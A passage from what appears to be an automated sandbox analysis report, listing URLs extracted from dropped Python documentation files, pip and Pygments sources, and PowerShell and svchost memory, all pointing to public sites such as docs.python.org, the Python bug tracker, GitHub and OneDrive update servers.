Source: 3.8.html.17.dr, 3.11.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=35134
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=35153
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=35224
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=35283
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=35345
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=35431
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=35459
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=35471
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=35537
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=35582
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=35606
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=35664
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=35702
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=35713
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=35766
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=35810
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=35813
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=35864
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=35884
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=35886
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=35892
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=35900
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=35904
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36004
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36012
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36016
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36018
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36027
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36048
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36084
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36085
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36127
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36264
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36268
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36297
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36320
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36326
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36348
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36381
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36384
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36465
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36475
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36492
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36540
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36546
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36588
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36623
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36669
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36673
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36676
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36707
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36721
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36722
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36728
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36763
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36772
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36785
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36793
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36817
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36829
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36887
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36895
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36917
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36921
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36933
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36952
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36974
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=36999
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=37007
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=37027
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=37028
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=37032
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=37128
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=37178
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=37221
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=37228
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=37351
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=37412
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=37481
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=37627
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=37765
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=37819
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=37834
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=37951
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=37966
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=38234
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=38944
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=4136
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=4195
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=4201
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=4258
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=4285
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=42967
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=4384
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=43882
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=4603
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=4688
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=4707
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=4739
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=4753
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=4868
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=4910
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=5084
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=5150
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=5175
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=5228
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=5237
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=5630
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=5675
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=5680
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=5914
Source: 3.1.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=6137
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=6584
Source: 3.8.html.17.dr	String found in binary or memory: https://bugs.python.org/issue?@action=redirect&bpo=9372
Source: whatnow.html.17.dr	String found in binary or memory: https://code.activestate.com/recipes/langs/python/
Source: unittest.mock-examples.html.17.dr	String found in binary or memory: https://code.google.com/archive/p/mock/issues/105
Source: 3.1.html.17.dr	String found in binary or memory: https://codereview.appspot.com/53094
Source: powershell.exe, 00000008.00000002.2431123146.0000025741663000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2431123146.0000025741663000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2431123146.0000025741663000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: tkinter.ttk.html.17.dr	String found in binary or memory: https://core.tcl.tk/tips/doc/trunk/tip/48.md
Source: 3.8.html.17.dr, 3.11.html.17.dr	String found in binary or memory: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10735
Source: 3.8.html.17.dr	String found in binary or memory: https://datatracker.ietf.org/doc/html/rfc3986.html
Source: uuid.html.17.dr, 2.5.html.17.dr	String found in binary or memory: https://datatracker.ietf.org/doc/html/rfc4122.html
Source: macos.py.17.dr	String found in binary or memory: https://developer.apple.com/library/archive/documentation/FileManagement/Conceptual/FileSystemProgra
Source: general.html.17.dr	String found in binary or memory: https://devguide.python.org/
Source: general.html.17.dr	String found in binary or memory: https://devguide.python.org/developer-workflow/development-cycle/
Source: 3.8.html.17.dr	String found in binary or memory: https://devguide.python.org/development-tools/clinic/
Source: general.html.17.dr	String found in binary or memory: https://devguide.python.org/setup/
Source: unix.html0.17.dr	String found in binary or memory: https://devguide.python.org/setup/#get-the-source-code
Source: unix.html0.17.dr	String found in binary or memory: https://docs.fedoraproject.org/en-US/package-maintainers/Packaging_Tutorial_GNU_Hello/
Source: whatnow.html.17.dr, 2.5.html.17.dr	String found in binary or memory: https://docs.python.org
Source: base64.py.17.dr	String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: general.html.17.dr	String found in binary or memory: https://docs.python.org/3/
Source: editors.html.17.dr, embedding.html.17.dr, xml.sax.handler.html.17.dr, xml.sax.reader.html.17.dr, unittest.mock.html.17.dr, coro.html.17.dr, gen.html.17.dr, capsule.html.17.dr, 3.8.html.17.dr, uuid.html.17.dr, typeobj.html.17.dr, interactive.html.17.dr, perfmaps.html.17.dr, unicode.html.17.dr, init_config.html.17.dr, contents.html.17.dr, general.html.17.dr, interpreter.html.17.dr, tkinter.ttk.html.17.dr, slice.html.17.dr, long.html.17.dr	String found in binary or memory: https://docs.python.org/3/_static/og-image.png
Source: capsule.html.17.dr	String found in binary or memory: https://docs.python.org/3/c-api/capsule.html
Source: coro.html.17.dr	String found in binary or memory: https://docs.python.org/3/c-api/coro.html
Source: gen.html.17.dr	String found in binary or memory: https://docs.python.org/3/c-api/gen.html
Source: hash.html.17.dr	String found in binary or memory: https://docs.python.org/3/c-api/hash.html
Source: import.html0.17.dr	String found in binary or memory: https://docs.python.org/3/c-api/import.html
Source: init_config.html.17.dr	String found in binary or memory: https://docs.python.org/3/c-api/init_config.html
Source: long.html.17.dr	String found in binary or memory: https://docs.python.org/3/c-api/long.html
Source: perfmaps.html.17.dr	String found in binary or memory: https://docs.python.org/3/c-api/perfmaps.html
Source: slice.html.17.dr	String found in binary or memory: https://docs.python.org/3/c-api/slice.html
Source: typeobj.html.17.dr	String found in binary or memory: https://docs.python.org/3/c-api/typeobj.html
Source: unicode.html.17.dr	String found in binary or memory: https://docs.python.org/3/c-api/unicode.html
Source: contents.html.17.dr	String found in binary or memory: https://docs.python.org/3/contents.html
Source: general.html.17.dr	String found in binary or memory: https://docs.python.org/3/download.html
Source: embedding.html.17.dr	String found in binary or memory: https://docs.python.org/3/extending/embedding.html
Source: general.html.17.dr	String found in binary or memory: https://docs.python.org/3/faq/general.html
Source: genindex-I.html.17.dr	String found in binary or memory: https://docs.python.org/3/genindex-I.html
Source: genindex-K.html.17.dr	String found in binary or memory: https://docs.python.org/3/genindex-K.html
Source: genindex-Q.html.17.dr	String found in binary or memory: https://docs.python.org/3/genindex-Q.html
Source: genindex-S.html.17.dr	String found in binary or memory: https://docs.python.org/3/genindex-S.html
Source: genindex-Symbols.html.17.dr	String found in binary or memory: https://docs.python.org/3/genindex-Symbols.html
Source: core.cpython-312.pyc.17.dr	String found in binary or memory: https://docs.python.org/3/library/re.html
Source: core.cpython-312.pyc.17.dr	String found in binary or memory: https://docs.python.org/3/library/re.html#re.sub
Source: tkinter.font.html.17.dr	String found in binary or memory: https://docs.python.org/3/library/tkinter.font.html
Source: tkinter.ttk.html.17.dr	String found in binary or memory: https://docs.python.org/3/library/tkinter.ttk.html
Source: unittest.mock-examples.html.17.dr	String found in binary or memory: https://docs.python.org/3/library/unittest.mock-examples.html
Source: unittest.mock.html.17.dr	String found in binary or memory: https://docs.python.org/3/library/unittest.mock.html
Source: uuid.html.17.dr	String found in binary or memory: https://docs.python.org/3/library/uuid.html
Source: xml.etree.elementtree.html.17.dr	String found in binary or memory: https://docs.python.org/3/library/xml.etree.elementtree.html
Source: xml.sax.handler.html.17.dr	String found in binary or memory: https://docs.python.org/3/library/xml.sax.handler.html
Source: xml.sax.reader.html.17.dr	String found in binary or memory: https://docs.python.org/3/library/xml.sax.reader.html
Source: general.html.17.dr	String found in binary or memory: https://docs.python.org/3/license.html
Source: introduction.html.17.dr	String found in binary or memory: https://docs.python.org/3/reference/introduction.html
Source: toplevel_components.html.17.dr	String found in binary or memory: https://docs.python.org/3/reference/toplevel_components.html
Source: search.html.17.dr	String found in binary or memory: https://docs.python.org/3/search.html
Source: floatingpoint.html.17.dr	String found in binary or memory: https://docs.python.org/3/tutorial/floatingpoint.html
Source: interactive.html.17.dr	String found in binary or memory: https://docs.python.org/3/tutorial/interactive.html
Source: interpreter.html.17.dr	String found in binary or memory: https://docs.python.org/3/tutorial/interpreter.html
Source: whatnow.html.17.dr	String found in binary or memory: https://docs.python.org/3/tutorial/whatnow.html
Source: editors.html.17.dr	String found in binary or memory: https://docs.python.org/3/using/editors.html
Source: unix.html0.17.dr	String found in binary or memory: https://docs.python.org/3/using/unix.html
Source: 3.1.html.17.dr	String found in binary or memory: https://docs.python.org/3/whatsnew/3.1.html
Source: 3.11.html.17.dr	String found in binary or memory: https://docs.python.org/3/whatsnew/3.11.html
Source: 3.8.html.17.dr	String found in binary or memory: https://docs.python.org/3/whatsnew/3.8.html
Source: unix.html0.17.dr	String found in binary or memory: https://en.opensuse.org/Portal:Packaging
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF13022000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF1305F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF13022000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF13003000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1822470393.000001EF13048000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF13022000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: perfmaps.html.17.dr	String found in binary or memory: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/tools/perf/Documentation/jit
Source: powershell.exe, 00000008.00000002.2388491689.0000025731818000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: __init__.py.17.dr	String found in binary or memory: https://github.com/pygments/pygments/archive/master.zip#egg=Pygments-dev
Source: cmdline.py.17.dr, cmdline.cpython-312.pyc.17.dr	String found in binary or memory: https://github.com/pygments/pygments/issues
Source: wheel.py.17.dr	String found in binary or memory: https://github.com/pypa/pip/issues/1150)
Source: req_file.cpython-312.pyc.17.dr	String found in binary or memory: https://github.com/pypa/pip/pull/3514
Source: egg_link.cpython-312.pyc.17.dr	String found in binary or memory: https://github.com/pypa/setuptools/issues/4167).
Source: general.html.17.dr	String found in binary or memory: https://github.com/python/cpython/
Source: capsule.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/capsule.rst
Source: coro.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/coro.rst
Source: gen.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/gen.rst
Source: hash.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/hash.rst
Source: import.html0.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/import.rst
Source: init_config.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/init_config.rst
Source: long.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/long.rst
Source: perfmaps.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/perfmaps.rst
Source: slice.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/slice.rst
Source: typeobj.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/typeobj.rst
Source: unicode.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/unicode.rst
Source: contents.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/contents.rst
Source: embedding.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/extending/embedding.rst
Source: general.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/faq/general.rst
Source: tkinter.font.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/tkinter.font.rst
Source: tkinter.ttk.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/tkinter.ttk.rst
Source: unittest.mock-examples.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/unittest.mock-examples.rst
Source: unittest.mock.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/unittest.mock.rst
Source: uuid.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/uuid.rst
Source: xml.etree.elementtree.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/xml.etree.elementtree.rst
Source: xml.sax.handler.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/xml.sax.handler.rst
Source: xml.sax.reader.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/xml.sax.reader.rst
Source: introduction.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/reference/introduction.rst
Source: toplevel_components.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/reference/toplevel_components.rst
Source: floatingpoint.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/tutorial/floatingpoint.rst
Source: interactive.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/tutorial/interactive.rst
Source: interpreter.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/tutorial/interpreter.rst
Source: whatnow.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/tutorial/whatnow.rst
Source: editors.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/using/editors.rst
Source: unix.html0.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/using/unix.rst
Source: 3.1.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/whatsnew/3.1.rst
Source: 3.11.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/whatsnew/3.11.rst
Source: 3.8.html.17.dr	String found in binary or memory: https://github.com/python/cpython/blob/main/Doc/whatsnew/3.8.rst
Source: general.html.17.dr	String found in binary or memory: https://github.com/python/cpython/issues
Source: 3.8.html.17.dr	String found in binary or memory: https://github.com/python/cpython/issues/83571
Source: 3.8.html.17.dr	String found in binary or memory: https://github.com/python/cpython/issues/83743
Source: 3.8.html.17.dr	String found in binary or memory: https://github.com/python/cpython/issues/85272
Source: 3.8.html.17.dr	String found in binary or memory: https://github.com/python/cpython/issues/87451
Source: tkinter.font.html.17.dr	String found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/tkinter/font.py
Source: tkinter.ttk.html.17.dr	String found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/tkinter/ttk.py
Source: unittest.mock.html.17.dr	String found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/unittest/mock.py
Source: uuid.html.17.dr	String found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/uuid.py
Source: xml.etree.elementtree.html.17.dr	String found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/xml/etree/ElementTree.py
Source: xml.sax.handler.html.17.dr	String found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/xml/sax/handler.py
Source: xml.sax.reader.html.17.dr	String found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/xml/sax/xmlreader.py
Source: unix.html0.17.dr	String found in binary or memory: https://github.com/python/cpython/tree/3.12/README.rst
Source: api.py0.17.dr	String found in binary or memory: https://httpbin.org/get
Source: general.html.17.dr	String found in binary or memory: https://infra.psf.io
Source: interactive.html.17.dr	String found in binary or memory: https://ipython.org/
Source: general.html.17.dr	String found in binary or memory: https://ir.cwi.nl/pub/18204
Source: introduction.html.17.dr	String found in binary or memory: https://ironpython.net/
Source: decoder.cpython-312.pyc.17.dr, decoder.py.17.dr	String found in binary or memory: https://json.org
Source: 3.1.html.17.dr	String found in binary or memory: https://json.org/
Source: floatingpoint.html.17.dr	String found in binary or memory: https://jvns.ca/blog/2023/01/13/examples-of-floating-point-problems/
Source: general.html.17.dr	String found in binary or memory: https://mail.python.org/mailman/listinfo/python-list
Source: general.html.17.dr	String found in binary or memory: https://mail.python.org/mailman3/lists/python-announce-list.python.org/
Source: general.html.17.dr	String found in binary or memory: https://mail.python.org/mailman3/lists/python-dev.python.org/
Source: whatnow.html.17.dr	String found in binary or memory: https://mail.python.org/pipermail/
Source: powershell.exe, 00000008.00000002.2431123146.00000257417A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2431123146.0000025741663000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF13022000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF12FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: general.html.17.dr	String found in binary or memory: https://peps.python.org/
Source: general.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0005/
Source: editors.html.17.dr, controlflow.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0008/
Source: 3.1.html.17.dr, 2.5.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0302/
Source: 3.1.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0372/
Source: general.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0373/
Source: 3.1.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0378/
Source: unicode.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0383/
Source: general.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0387/
Source: unicode.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0393/
Source: init_config.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0432/
Source: typeobj.html.17.dr, 3.4.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0442/
Source: hash.html.17.dr, 3.4.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0456/
Source: 3.8.html.17.dr, 3.11.html.17.dr, 3.12.html.17.dr, controlflow.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0484/
Source: 3.8.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0526/
Source: init_config.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0528/
Source: 3.8.html.17.dr, unicode.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0529/
Source: init_config.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0538/
Source: init_config.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0540/
Source: 3.8.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0544/
Source: init_config.html.17.dr, 3.11.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0552/
Source: 3.8.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0570/
Source: 3.8.html.17.dr, 3.12.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0572/
Source: 3.8.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0574/
Source: 3.8.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0578/
Source: 3.8.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0586/
Source: 3.8.html.17.dr, init_config.html.17.dr, 3.11.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0587/
Source: 3.8.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0589/
Source: 3.8.html.17.dr, 3.11.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0590/
Source: 3.8.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0591/
Source: 3.11.html.17.dr, 3.12.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0594/
Source: general.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0602/
Source: unicode.html.17.dr, 3.12.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0623/
Source: 3.11.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0624/
